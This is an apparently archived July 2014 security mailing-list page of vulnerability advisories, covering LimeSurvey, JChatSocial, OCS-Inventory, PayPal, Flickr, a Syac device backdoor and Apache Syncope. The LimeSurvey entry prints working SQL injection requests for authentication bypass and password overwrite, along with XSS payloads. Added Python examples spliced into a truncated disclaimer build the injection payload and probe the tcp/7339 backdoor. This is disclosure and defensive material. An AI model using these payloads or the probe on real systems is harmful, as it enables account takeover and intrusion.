Lime Survey 2-05+ Multiple Vulnerabilities

2014-07-07 Thread g-damore
Lime Survey Multiple Vulnerabilities
===

[ADVISORY INFORMATION]
Title:           Lime Survey Multiple Vulnerabilities
Discovery date:  02/07/2014
Release date:    03/07/2014
Vendor Homepage: www.limesurvey.org
Version:         Lime Survey 2.05+ Build 140618
Tested with:     MS SQL Server 2008
Credits:         Giuseppe D'Amore
                 (http://it.linkedin.com/pub/giuseppe-d-amore/69/37/66b)
 
[VULNERABILITY INFORMATION]
Class:  SQL Injection + XSS
Category:   Web

[AFFECTED PRODUCTS]
This security vulnerability affects:

* Lime Survey 2.05+ Build 140618

[VULNERABILITY DETAILS]
Multi-Byte SQL Injection
---

As shown in frontend_helper.php:

**
function loadanswers()
{
global $surveyid;
global $thissurvey, $thisstep;
global $clienttoken;
    $clang = Yii::app()->lang;

    $scid=returnGlobal('scid',true);
    if (Yii::app()->request->getParam('loadall') == "reload")
    {
        $query = "SELECT * FROM {{saved_control}} INNER JOIN {$thissurvey['tablename']}
                  ON {{saved_control}}.srid = {$thissurvey['tablename']}.id
                  WHERE {{saved_control}}.sid=$surveyid\n";
        if (isset($scid)) //Would only come from email
        {
            $query .= "AND {{saved_control}}.scid={$scid}\n";
        }
        $query .="AND {{saved_control}}.identifier = '".autoEscape($_SESSION['survey_'.$surveyid]['holdname'])."' ";
**

the function autoEscape is applied to the holdname parameter; this function is
defined in the file common_helper.php

**
function autoEscape($str) {
if (!get_magic_quotes_gpc()) {
return addslashes ($str);
}
return $str;
}
**

addslashes can be bypassed using the GBK charset. So sending this request:

**
POST /limesurvey/index.php?r=survey/index HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/limesurvey/index.php?r=survey/index
Cookie: PHPSESSID=as31m846sa46p2uqso1eopc587; 
YII_CSRF_TOKEN=a3d3b2de671e18e0eb5b9fbe64f049a66bfe23b2
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 125

YII_CSRF_TOKEN=a3d3b2de671e18e0eb5b9fbe64f049a66bfe23b2&loadname=chr(0x87) . ' OR 1=1 -- ;&loadpass=test&loadsecurity=89&sid=713149&loadall=reload
**

it is possible to bypass incomplete survey authentication.

Stacked Query SQL Injection
---

Sending this request:

**
POST /limesurvey/index.php?r=admin/participants/sa/getParticipants_json HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: 
http://localhost/limesurvey/index.php?r=admin/participants/sa/displayParticipants
Content-Length: 141
Cookie: PHPSESSID=as31m846sa46p2uqso1eopc587; 
YII_CSRF_TOKEN=a3d3b2de671e18e0eb5b9fbe64f049a66bfe23b2
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

YII_CSRF_TOKEN=a3d3b2de671e18e0eb5b9fbe64f049a66bfe23b2&searchcondition=&_search=false&nd=1404300424270&rows=25&page=1&sidx=lastname]; update lime_users set password='880e042d271f08cd3c456f28704702a6b0ad1c7b442f257bf40578112c8e6ffb';+--+P&sord=asc
**


it is possible to change the user's password.

Reflected XSS
---

GET /limesurvey/index.php?r=admin%2fparticipants%2fsa%2fgetAttribute_json%2fpid%2f9b0039e2-b346-473d-901f-7010d2bc88c16c2d4<img%20src%3da%20onerror%3dalert(1)>9b6d6fe2f71&YII_CSRF_TOKEN=76fa68bdfde6a997ee64f01726234fd7897e2289&_search=false&nd=140420566784

GET /limesurvey/index.php?r=admin/globalsettings&sa=a<script>alert(1)</script>a

XSS via CSV
---

it is possible to create a .csv file containing <script>alert(2)</script>,0
and upload it with the Import CSV functionality.

 
[DISCLOSURE TIME-LINE]
* 02/07/2014 - Initial vendor contact.
 
* 02/07/2014 - Lime Survey Team confirmed the issue is a new security 
vulnerability.
 
* 02/07/2014 - Vendor has fixed this vulnerability on Git.
 
* 03/07/2014 - Public disclosure.
 
[DISCLAIMER]
The author is not 
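The following is an added worked example, not code from the advisory or from LimeSurvey. It emulates PHP addslashes() on raw bytes and shows why the 0x87 lead byte lets the quote survive once the bytes are decoded as GBK (Python's gbk codec stands in for the database connection's charset), and it sketches an allowlist for the sidx sort column, the usual fix for the stacked-query issue, since identifiers cannot be bound as query parameters. The names php_addslashes, quote_survives_escaping, safe_order_by and the SORTABLE_COLUMNS set are this example's own assumptions.

```python
# Added example (not part of the advisory or LimeSurvey): byte-level emulation of
# PHP addslashes() and of the GBK decoding that defeats it, plus an identifier
# allowlist for the jqGrid sort column. All names here are hypothetical.

# Bytes that addslashes() prefixes with a backslash: ' " \ and NUL
ESCAPED = frozenset(b"'\"\\\x00")

def php_addslashes(data: bytes) -> bytes:
    """Emulate PHP addslashes(): operates on bytes, knows nothing about charsets."""
    out = bytearray()
    for b in data:
        if b in ESCAPED:
            out.append(0x5C)  # backslash
        out.append(b)
    return bytes(out)

def has_unescaped_quote(text: str) -> bool:
    """True if a single quote in text is not guarded by a preceding backslash."""
    i = 0
    while i < len(text):
        ch = text[i]
        if ch == "\\":
            i += 2  # the backslash consumes the next character
            continue
        if ch == "'":
            return True
        i += 1
    return False

def quote_survives_escaping(payload: bytes, charset: str) -> bool:
    """Escape as PHP does, then decode as the DB connection would, and check the quote."""
    escaped = php_addslashes(payload)
    decoded = escaped.decode(charset, errors="replace")
    return has_unescaped_quote(decoded)

def multibyte_payload(lead_byte: int = 0x87) -> bytes:
    """The advisory's trick: a GBK lead byte, then a quote, then the SQL tail.
    In GBK, lead 0x81..0xFE plus trail 0x40..0xFE form one character, so the
    inserted backslash (0x5C) is swallowed into the character before the quote."""
    return bytes([lead_byte]) + b"' OR 1=1 -- "

# Hypothetical allowlist of sortable participant columns (assumed, not LimeSurvey's).
SORTABLE_COLUMNS = frozenset({"firstname", "lastname", "email", "language"})

def safe_order_by(sidx: str, sord: str) -> str:
    """Column names cannot be bound as parameters; accept only known identifiers."""
    if sidx not in SORTABLE_COLUMNS:
        raise ValueError(f"unsupported sort column: {sidx!r}")
    direction = "ASC" if sord.lower() == "asc" else "DESC"
    return f"ORDER BY {sidx} {direction}"

if __name__ == "__main__":
    p = multibyte_payload()
    print(php_addslashes(p))
    print("utf-8:", quote_survives_escaping(p, "utf-8"))  # backslash still guards the quote
    print("gbk:  ", quote_survives_escaping(p, "gbk"))    # 0x87 0x5C merge; the quote is live
    print(safe_order_by("lastname", "asc"))
```

Parameterised queries remove the first problem entirely (the quote is never part of SQL text); the allowlist is needed for the second because ORDER BY takes an identifier, which no driver can bind.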

[SECURITY] [DSA 2972-1] linux security update

2014-07-07 Thread Salvatore Bonaccorso
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

------------------------------------------------------------------------
Debian Security Advisory DSA-2972-1   secur...@debian.org
http://www.debian.org/security/  Salvatore Bonaccorso
July 06, 2014  http://www.debian.org/security/faq
------------------------------------------------------------------------

Package: linux
CVE ID : CVE-2014-4699

Andy Lutomirski discovered that the ptrace syscall was not verifying the
RIP register to be valid in the ptrace API on x86_64 processors. An
unprivileged user could use this flaw to crash the kernel (resulting in
denial of service) or for privilege escalation.

For the stable distribution (wheezy), this problem has been fixed in
version 3.2.60-1+deb7u1. In addition, this update contains several
bugfixes originally targeted for the upcoming Wheezy point release.

For the unstable distribution (sid), this problem will be fixed soon.

We recommend that you upgrade your linux packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org



Re: Android KeyStore Stack Buffer Overflow (CVE-2014-3100)

2014-07-07 Thread a . blas
Hi, 

We have just released an App to check if your device is affected by this bug:

https://play.google.com/store/apps/details?id=com.actisec.keystorescanner

Thanks.
Arturo


CVE-2014-3863 - Stored XSS in JChatSocial

2014-07-07 Thread Teodor Lupan
CVE-2014-3863
===
Stored Cross-Site Scripting (XSS) (CWE-79) vulnerability in
JChatSocial Joomla extension.

Vendor
===
Joomla! Extensions Store

Product
===
JChatSocial: the Joomla live chat
JChatSocial is a powerful chat system for Joomla with a look so similar
to Facebook chat and it's easy to install and configure. Users can
choose to start a private chat or join a group conversation, all
completely free of charge because data stream is processed on your
server. In addition JChatSocial integrates with Skype software to start
video calls directly within your Joomla! site, and has many advanced
feature such as attachments exchange, avatars and more.  - source:
http://storejoomla.org/extensions/jchatsocial.html

Affected versions
===
This vulnerability affects JChatSocial version 2.2 and probably lower.

Solution
===
The vendor fixed the issue within a few hours of receiving the
vulnerability details, on 29.05.2014.

Reported by
===
This issue was reported to the vendor by Teodor Lupan following a
responsible disclosure process.

Severity
===
High

Exploitability
===
Easy: no user interaction required

Description
===
The discovered Stored Cross-Site Scripting can be used by anonymous
(unregistered) users or, on some setups, registered users to target
any other user type, including (Joomla) administrators, and execute any
XSS attack type, such as stealing their session ID.

Vulnerability details:
In an active JChat window, it is possible to upload a file and send it
to any other connected user. An attacker could insert
malicious JavaScript code into the 'filename' input parameter which will
be included into the active chat window and executed by the browser
of the target without user interaction.


-- 
Teodor Lupan - LPT, CEH, OSCP
Technical Director

Strada Doamna Cheajna nr. 1-3,
etaj 4, Birou 7, Sector 3,
cod 31233, Bucureşti, România
Tel/Fax: +4 021 316 05 65
Mobil: +4 0723 010 220
e-mail: teodor.lu...@safetech.ro
Web: www.safetech.ro



iTunes 11.2.2 for Windows: completely outdated and vulnerable 3rd party libraries

2014-07-07 Thread Stefan Kanthak
Hi @ll,

Apple's current iTunes 11.2.2 for Windows comes with the following
COMPLETELY outdated and vulnerable 3rd party libraries (as part of
AppleApplicationSupport.msi):

* libeay32.dll and ssleay32.dll 0.9.8d

  are more than SEVEN years old and have at least 27 unfixed CVEs!
  the current version is 0.9.8za, see http://www.openssl.org/news/


* libcurl.dll 7.16.2

  is more than SEVEN years old and has at least 18 unfixed CVEs!
  the current version is 7.37.0;
  see http://curl.haxx.se/docs/security.html
  for the fixed vulnerabilities!


* libxml2.dll 2.6.0.0

  is more than TEN years old and has at least 17 unfixed CVEs!
  the current version is 2.9.1, for the latest vulnerability see
  CVE-2013-0339


* icuuc40.dll, icuin40.dll, icudt49.dll, libicuuc.dll and libicuin.dll 49.1.1

  have at least 4 unfixed CVEs: CVE-2013-2419, CVE-2013-2383, CVE-2013-2384,
  CVE-2013-1569


Until Apple's developers start to develop a sense for safety and security:
stay away from their (Windows) software!


regards
Stefan Kanthak


Timeline:
~

2014-06-06    informed vendor

2014-06-06    vendor sent automated response

... no more reaction

2014-07-03    requested status

... no answer

2014-07-07    report published


{CVE-ID request} - OCS-Inventory-NG Multiple Stored Cross Site Scripting Vulnerabilities.

2014-07-07 Thread Madhu Akula



# Title: Multiple Stored Cross Site Scripting Vulnerabilities
# Author: Madhu Akula
# Vendor Homepage: http://www.ocsinventory-ng.org/en/
# Software Link: http://www.ocsinventory-ng.org/en/download/
# Tested on: Chrome, Mozilla



Reporter Name : Madhu Akula

Product : OCS-Inventory NG

Version : All Versions

Modules : OCS Reports Web Interface

Tested On : Windows, Linux, Mac

Browsers : Firefox, Chrome, IE and all others

Priority : High

Severity: Critical

Status : New

Summary : Multiple Stored Cross Site Scripting Vulnerabilities lead to
takeover of user accounts, internal network scanning and some
advanced attacks

Description :

About Vulnerability :

Stored attacks are those where the injected script is permanently stored
on the target servers, such as in a database, in a message forum,
visitor log, comment field, etc. The victim then retrieves the malicious
script from the server when it requests the stored information.

Impact :

Attackers can execute scripts in a victim’s browser to hijack user
sessions, deface web sites, insert hostile content, redirect users,
hijack the user’s browser using malware, etc.

For more reference :

https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)

Conclusion :

By using this vulnerability, attackers can use frameworks like BeEF or
OWASP Xenotix to exploit the victims' browsers, install keyloggers and
carry out other malicious activities. It is very high severity and
affects all fields and versions.

Steps to Reproduce : (POC)

I created a clear PoC; the link is here:

https://www.dropbox.com/s/7bbdv8o8q1faotk/ocsng_sxsss.ogv

Mitigation :

Fixed release in SVN


References :

http://packetstormsecurity.com/files/127295/OCS-Inventory-NG-Cross-Site-Scripting.html
http://cxsecurity.com/issue/WLB-2014070004
http://www.securityfocus.com/bid/68292
http://irist.ir/exploits-1663.html

Credit :
Madhu Akula
Information Security Researcher
https://www.twitter.com/madhuakula





Backdoor access to Techboard/Syac devices

2014-07-07 Thread roberto . paleari
[ADVISORY INFORMATION]
Title:  Backdoor access to Techboard/Syac devices
Discovery date: 02/04/2014
Release date:   07/07/2014
Advisory URL:   http://blog.emaze.net/2014/07/backdoor-techboardsyac.html
Credits:Roberto Paleari (@rpaleari),
Luca Giancane (luca.gianc...@emaze.net)

[VULNERABILITY INFORMATION]
Class:  Command execution, Authentication bypass

[AFFECTED PRODUCTS]
We confirm the presence of the security vulnerability on the following
products/firmware versions:
   * Techboard/Syac DigiEye 3G (software version 3.19.30004)

Other device models and firmware versions are probably also vulnerable, but
they were not checked.

[VULNERABILITY DETAILS]
During a security assessment on one of our customers, we had the opportunity to
analyze a Techboard/Syac DigiEye. The assessment led to the identification of a
critical security vulnerability, described in the next paragraphs.

More in detail, affected devices include a backdoor service listening on TCP
port 7339. This service implements a challenge-response protocol to
authenticate clients. After this step, clients are allowed to execute
arbitrary commands on the device, with administrative (root) privileges. We
would like to stress that, to the best of our knowledge, end users are not
allowed to disable the backdoor service, nor to control the authentication
mechanism.

As vulnerable devices are still widely deployed on the Internet, we won't
release the full details on the backdoor communication protocol. Instead, we
just document the initial protocol handshake, in order to allow
Techboard/Syac customers to identify vulnerable devices on their networks.

Strictly speaking, the protocol handshake works as follows:

1. The client connects to port tcp/7339 of the vulnerable device and sends the
   string KNOCK-KNOCK-ANYONETHERE?, terminated with a NULL byte.

2. The server replies with a 12-byte response. First 8 bytes are a timestamp,
   while last 4 bytes are a magic number equal to 0x000aae60.

3. The timestamp provided by the server is then used to feed the
   challenge/response procedure.

Together with this security advisory, we provide a Nmap NSE script to identify
vulnerable devices.

[REMEDIATION]
We contacted Techboard/Syac on April 2nd, 2014 and provided them with the
technical details of the vulnerability we found. The device vendor promptly
replied back to our e-mails and, on April 9th, they confirmed a patched
firmware version was going to be released to their customers. However, the
patched firmware was not checked by Emaze.

[COPYRIGHT]
Copyright(c) Emaze Networks S.p.A 2014, All rights reserved worldwide.
Permission is hereby granted to redistribute this advisory, providing that no
changes are made and that the copyright notices and disclaimers remain intact.

[DISCLAIMER]
Emaze Networks S.p.A is not responsible for the misuse of the information
provided in our security advisories. These advisories are a service to the
professional security community. There are NO WARRANTIES with regard to this
information. Any application or distribution of this information constitutes
acceptance AS IS, at the user's own risk. This information is subject to change
without notice.
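The handshake documented above, as an added example that is not part of the Emaze advisory or its NSE script: it builds the tcp/7339 probe, classifies the 12-byte reply (8-byte timestamp followed by the 4-byte magic 0x000aae60), and, for the defender, flags a captured payload that carries the knock string. The advisory does not state the byte order of the magic or the timestamp, so both orders are tried; PROBE, MAGIC, parse_reply, is_knock, probe_host and fake_reply are this example's own names, and the reply used offline is constructed, not captured from a device.

```python
# Added example (not from the advisory): identify a DigiEye backdoor listener by
# its tcp/7339 handshake. Byte order is an assumption checked both ways.
import socket
import struct

BACKDOOR_PORT = 7339
PROBE = b"KNOCK-KNOCK-ANYONETHERE?\x00"  # knock string from the advisory, NUL-terminated
MAGIC = 0x000AAE60                        # 4-byte magic from the advisory
REPLY_LEN = 12                            # 8-byte timestamp + 4-byte magic

def parse_reply(reply: bytes) -> dict:
    """Classify a reply. A 12-byte answer whose tail is MAGIC (either byte order)
    means the backdoor service answered; the timestamp feeds the challenge/response."""
    result = {"vulnerable": False, "byte_order": None, "timestamp": None}
    if len(reply) != REPLY_LEN:
        return result
    ts_raw, magic_raw = reply[:8], reply[8:]
    for order in ("<", ">"):  # little-endian first, then big-endian (assumption)
        if struct.unpack(order + "I", magic_raw)[0] == MAGIC:
            result.update(vulnerable=True, byte_order=order,
                          timestamp=struct.unpack(order + "Q", ts_raw)[0])
            break
    return result

def is_knock(payload: bytes) -> bool:
    """Detection side: does a client payload towards tcp/7339 start with the knock?"""
    return payload.startswith(PROBE)

def probe_host(host: str, port: int = BACKDOOR_PORT, timeout: float = 3.0) -> dict:
    """Send the knock and read up to 12 bytes, then classify. Network use only."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(PROBE)
        reply = b""
        while len(reply) < REPLY_LEN:
            chunk = sock.recv(REPLY_LEN - len(reply))
            if not chunk:
                break
            reply += chunk
    return parse_reply(reply)

def fake_reply(timestamp: int, order: str = "<") -> bytes:
    """Constructed reply for offline testing; not captured from a real device."""
    return struct.pack(order + "Q", timestamp) + struct.pack(order + "I", MAGIC)

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        print(probe_host(sys.argv[1]))          # e.g. python probe.py 192.0.2.10
    else:
        print(parse_reply(fake_reply(1404720000)))
```

The scan only completes the first step of the handshake and never sends a challenge response, so it identifies the listener without exercising the command channel.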


PayPal Inc Bug Bounty #74 - Persistent Core Backend Vulnerability

2014-07-07 Thread Vulnerability Lab
Document Title:
===
PayPal Inc Bug Bounty #74 - Persistent Core Backend Vulnerability


References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1278

PayPal Inc Security UID: cDc49dT


Release Date:
=
2014-06-04


Vulnerability Laboratory ID (VL-ID):

1278


Common Vulnerability Scoring System:

8.9


Product & Service Introduction:
===
PayPal is a global e-commerce business allowing payments and money transfers to 
be made through the Internet. Online money 
transfers serve as electronic alternatives to paying with traditional paper 
methods, such as checks and money orders. Originally, 
a PayPal account could be funded with an electronic debit from a bank account 
or by a credit card at the payer's choice. But some 
time in 2010 or early 2011, PayPal began to require a verified bank account 
after the account holder exceeded a predetermined 
spending limit. After that point, PayPal will attempt to take funds for a 
purchase from funding sources according to a specified 
funding hierarchy. If you set one of the funding sources as Primary, it will 
default to that, within that level of the hierarchy 
(for example, if your credit card ending in 4567 is set as the Primary over 
1234, it will still attempt to pay money out of your 
PayPal balance, before it attempts to charge your credit card). The funding 
hierarchy is a balance in the PayPal account; a 
PayPal credit account, PayPal Extras, PayPal SmartConnect, PayPal Extras Master 
Card or Bill Me Later (if selected as primary 
funding source) (It can bypass the Balance); a verified bank account; other 
funding sources, such as non-PayPal credit cards.
The recipient of a PayPal transfer can either request a check from PayPal, 
establish their own PayPal deposit account or request 
a transfer to their bank account.

PayPal is an acquirer, performing payment processing for online vendors, 
auction sites, and other commercial users, for which it 
charges a fee. It may also charge a fee for receiving money, proportional to 
the amount received. The fees depend on the currency 
used, the payment option used, the country of the sender, the country of the 
recipient, the amount sent and the recipient's account 
type. In addition, eBay purchases made by credit card through PayPal may incur 
extra fees if the buyer and seller use different currencies.

( Copy of the Homepage: www.paypal.com ) [ http://en.wikipedia.org/wiki/PayPal ]


Abstract Advisory Information:
==
The Vulnerability Laboratory Research Team (Benjamin Kunz Mejri) discovered an 
application-side vulnerability in the official  PayPal Inc ethernet portal 
backend application (api).


Vulnerability Disclosure Timeline:
==
2013-02-12: Researcher Notification & Coordination (Benjamin Kunz Mejri)
2013-02-12: Vendor Notification (PayPal Inc Site Security Team - Bug Bounty 
Program)
2013-10-28: Vendor Response/Feedback (PayPal Inc Site Security Team - Bug 
Bounty Program)
2014-01-28: Vendor Fix/Patch (PayPal Inc - Developer Team - Reward: 1000$)
2014-07-04: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

PayPal Inc
Product: Core Application 2014 Q2


Exploitation Technique:
===
Remote


Severity Level:
===
Critical


Technical Details & Description:

An application-side validation web vulnerability and a filter bypass has been 
discovered in the official  PayPal Inc ethernet portal backend application 
(api).
The filter bypass allows remote attackers to evade the regular parse and encode 
filter mechanism of the paypal inc online-service portal web-application.
The persistent input validation vulnerability allows remote attackers to inject 
own malicious script codes on the application-side of the vulnerable service.

In a reverse analysis after several legal tests against the PayPal Inc 
infrastructure, we decided to test a new kind of scenario against the 
service API. Our team tried to blindly evade and bypass the online service 
filter validation of the backend listings with main values of the profile. 
This means that whenever a moderator or admin is viewing the profile of the 
PayPal Inc DB-listed user in the ethernet, the persistently injected code 
executes. In the attack scenario we injected malicious test codes with 
scripts in the most attractive values of the PayPal user profile database: 
`bank account owner/holder (cardholder)`, `name/surname`, `companyname` 
and of course the `account owner`. In the morning (2013-02-12) PayPal 
responded to us with the following mail (review PoC). 

The security risk of the application-side validation vulnerability in the 
security card system module is estimated as 

Paypal Inc Bug Bounty #109 Multi Shipping Application API - Filter Bypass Persistent Vulnerability

2014-07-07 Thread Vulnerability Lab
Document Title:
===
Paypal Inc Bug Bounty #109 Multi Shipping Application API - Filter Bypass  
Persistent Vulnerability


References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1050

PayPal Security UID: Pq115cey



Release Date:
=
2014-05-14


Vulnerability Laboratory ID (VL-ID):

1050


Common Vulnerability Scoring System:

4


Product & Service Introduction:
===
PayPal is a global e-commerce business allowing payments and money transfers to 
be made through the Internet. Online money 
transfers serve as electronic alternatives to paying with traditional paper 
methods, such as checks and money orders. Originally, 
a PayPal account could be funded with an electronic debit from a bank account 
or by a credit card at the payer's choice. But some 
time in 2010 or early 2011, PayPal began to require a verified bank account 
after the account holder exceeded a predetermined 
spending limit. After that point, PayPal will attempt to take funds for a 
purchase from funding sources according to a specified 
funding hierarchy. If you set one of the funding sources as Primary, it will 
default to that, within that level of the hierarchy 
(for example, if your credit card ending in 4567 is set as the Primary over 
1234, it will still attempt to pay money out of your 
PayPal balance, before it attempts to charge your credit card). The funding 
hierarchy is a balance in the PayPal account; a 
PayPal credit account, PayPal Extras, PayPal SmartConnect, PayPal Extras Master 
Card or Bill Me Later (if selected as primary 
funding source) (It can bypass the Balance); a verified bank account; other 
funding sources, such as non-PayPal credit cards.
The recipient of a PayPal transfer can either request a check from PayPal, 
establish their own PayPal deposit account or request 
a transfer to their bank account.

PayPal is an acquirer, performing payment processing for online vendors, 
auction sites, and other commercial users, for which it 
charges a fee. It may also charge a fee for receiving money, proportional to 
the amount received. The fees depend on the currency 
used, the payment option used, the country of the sender, the country of the 
recipient, the amount sent and the recipient's account 
type. In addition, eBay purchases made by credit card through PayPal may incur 
extra fees if the buyer and seller use different currencies.

On October 3, 2002, PayPal became a wholly owned subsidiary of eBay. Its 
corporate headquarters are in San Jose, California, United 
States at eBay's North First Street satellite office campus. The company also 
has significant operations in Omaha, Nebraska, Scottsdale, 
Arizona, and Austin, Texas, in the United States, Chennai, Dublin, Kleinmachnow 
(near Berlin) and Tel Aviv. As of July 2007, across 
Europe, PayPal also operates as a Luxembourg-based bank.

On March 17, 2010, PayPal entered into an agreement with China UnionPay (CUP), 
China's bankcard association, to allow Chinese consumers 
to use PayPal to shop online. PayPal is planning to expand its workforce in Asia 
to 2,000 by the end of the year 2010.
Between December 4–9, 2010, PayPal services were attacked in a series of 
denial-of-service attacks organized by Anonymous in retaliation 
for PayPal's decision to freeze the account of WikiLeaks citing terms of use 
violations over the publication of leaked US diplomatic cables.

(Copy of the Homepage: www.paypal.com) [http://en.wikipedia.org/wiki/PayPal]


Abstract Advisory Information:
==
The Vulnerability Laboratory Research Team has discovered a filter bypass  
persistent Web Vulnerability in the Paypal Inc core web application api.


Vulnerability Disclosure Timeline:
==
2013-08-15: Researcher Notification & Coordination (Ateeq ur Rehman Khan)
2013-08-16: Vendor Notification (PayPal Site Security Team - Bug Bounty Program)
2013-12-22: Vendor Response/Feedback (PayPal Site Security Team - Bug Bounty 
Program)
2014-05-10: Vendor Fix/Patch (PayPal Developer Team - Reward: Bug Bounty)
2014-05-14: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Technical Details & Description:

A filter bypass and persistent script code injection vulnerability has been 
discovered in the official Paypal service application and common service api. 
The vulnerability allows an attacker to inject own malicious script codes in 
the vulnerable module on the application side (persistent).

The vulnerability has been discovered in the Paypal MOS (Multi Order Shipping) 
Web Application (https://ship.paypal.com) and the vulnerability exists 
in the `Preset` module. While 

Yahoo! Bug Bounty #25 Flickr API - Persistent Service Vulnerability

2014-07-07 Thread Vulnerability Lab
Document Title:
===
Yahoo! Bug Bounty #25 Flickr API - Persistent Vulnerability


References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1132


Release Date:
=
2014-07-06


Vulnerability Laboratory ID (VL-ID):

1132


Common Vulnerability Scoring System:

4.1


Product & Service Introduction:
===
Flickr is an image hosting and video hosting website, and web services suite 
that was created by Ludicorp in 2004 and acquired by Yahoo 2005. 
In addition to being a popular website for users to share and embed personal 
photographs, and effectively an online community, the service is 
widely used by photo researchers and by bloggers to host images that they embed 
in blogs and social media.

The Verge reported in March 2013 that Flickr had a total of 87 million 
registered members and more than 3.5 million new images uploaded daily.
In August 2011 the site reported that it was hosting more than 6 billion images 
and this number continues to grow steadily according to 
reporting sources. Photos and videos can be accessed from Flickr without the 
need to register an account but an account must be made in order 
to upload content onto the website. Registering an account also allows users to 
create a profile page containing photos and videos that the 
user has uploaded and also grants the ability to add another Flickr user as a 
contact. For mobile users, Flickr has official mobile apps for 
iOS, Android, PlayStation Vita, and Windows Phone operating systems.

(Copy of the Homepage: http://en.wikipedia.org/wiki/Flickr )


Abstract Advisory Information:
==
The Vulnerability Laboratory Research team discovered a persistent input 
validation web vulnerability in the official Yahoo Flickr! website 
web-application and api.


Vulnerability Disclosure Timeline:
==
2013-11-03: Researcher Notification & Coordination (Ateeq ur Rehman Khan - 
Vulnerability Lab)
2013-11-04: Vendor Notification (Yahoo! Security Team - Bug Bounty Program)
2014-01-09: Vendor Response/Feedback (Yahoo! Security Team - Bug Bounty 
Program)
2014-06-22: Vendor Fix/Patch (Yahoo! Developer Team - HackerOne Reward: 
1000$)
2014-07-06: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

Yahoo!
Product: Flickr Web Application - YPL API  2013 Q3


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Technical Details & Description:

A persistent input validation vulnerability has been discovered in the official 
Yahoo Flickr! website web-application and api.
The vulnerability allows remote attackers to inject own malicious script codes 
to the application-side of the online-service.

The vulnerability is located in the flickr `invite` mail notification module. 
Remote attackers are able to inject payloads to 
the `message` value of the web-application notification service after the 
registration. The remote attacker can send invitation 
mails through the yahoo online-service module with manipulated message body 
context. The attack vector of the issue is located 
on the application-side and the request method to inject own malicious codes is 
POST.

The security risk of the persistent remote web vulnerability is estimated as 
medium with a cvss (common vulnerability scoring 
system) count of 4.1. Exploitation of the vulnerability requires low user 
interaction and a low privileged flickr web-application 
user account. Successful exploitation of the vulnerability results in session 
hijacking (customers), account theft via persistent 
web attack (mail), persistent phishing or persistent manipulation of the 
notification mail module context.

Vulnerable Service(s):
[+] Yahoo! & Flickr

Vulnerable Module(s):
[+] Invite (Invitation of Users)

Vulnerable Module(s):
[+] Notification Service (eMails)

Vulnerable Parameter(s):
[+] message (body)


Proof of Concept (PoC):
===
The persistent input validation web vulnerability can be exploited by remote 
attackers with low privileged yahoo web application user account 
and low user interaction. For demonstration or to reproduce the security 
vulnerability follow the provided information and steps below to continue.

PoC: Flickr Message - Invitation Attachment & Message Body

<tr style="mso-yfti-irow:1">
  <td style="padding:1.5pt 1.5pt 1.5pt 1.5pt">
  <p class="MsoNormal"><span 
style="font-family:Arial,sans-serif;font-size:10.0pt">
<o:p></o:p></span></p>
  </td>
 </tr>
 <tr style="mso-yfti-irow:2">
  td style=border:solid #CC 1.0pt;mso-border-alt:solid #CC .75pt;
  

[SECURITY] CVE-2014-3503 Apache Syncope

2014-07-07 Thread Francesco Chicchiriccò


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1



CVE-2014-3503: Insecure Random implementations used to generate passwords in
Apache Syncope

Severity: Major

Vendor: The Apache Software Foundation

Versions Affected:

This vulnerability affects all versions of Apache Syncope 1.1.x prior to 
1.1.8 'Ad libitum'. The 1.0.x releases are not affected.

Description:

A password is generated for a user in Apache Syncope under certain
circumstances, when no existing password is found. However, the password
generation code is relying on insecure Random implementations, which means that
an attacker could attempt to guess a generated password.

This has been fixed in revision:

http://svn.apache.org/viewvc?view=revision&revision=1596537

Migration:

Syncope 1.0.x users are not affected by this issue.
Syncope 1.1.x users should upgrade to 1.1.8 'Ad libitum' as soon as possible.

References: http://syncope.apache.org/security.html

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQEcBAEBAgAGBQJTunsUAAoJEGe/gLEK1TmDj4AH/05J9ZOB/gyem18F9MTcG+PB
tuX7EGemHCU+fyKeTetyGdhzZzdNquMA3mR4UXOEKH1Fok4LvkBWF+BoKMSY8DgY
vtWcZUfdJFeUd1XpdUrW0D/GEbbIdmijkbVoAZ3703RMpRiDBiVBkaBr/tjC6tuf
WUoBueRmNTkInBQhabaNYXvC0vyPA5ARhu1CprJ5QpA3aFoIEaVdlJTd+Mg58vJS
tlwoyGIUEUY/pusBKaZDkTVAJhrOS9b5atjlqCPlT3kGUbQOYgRPPTihX+0CMIY2
JE4yUXR8Kx6tvgebtft2IoUp6oZdR+XqHnEe3Tv1UnSRmlHj6o+tTCBDMmm1YOY=
=o17e
-----END PGP SIGNATURE-----
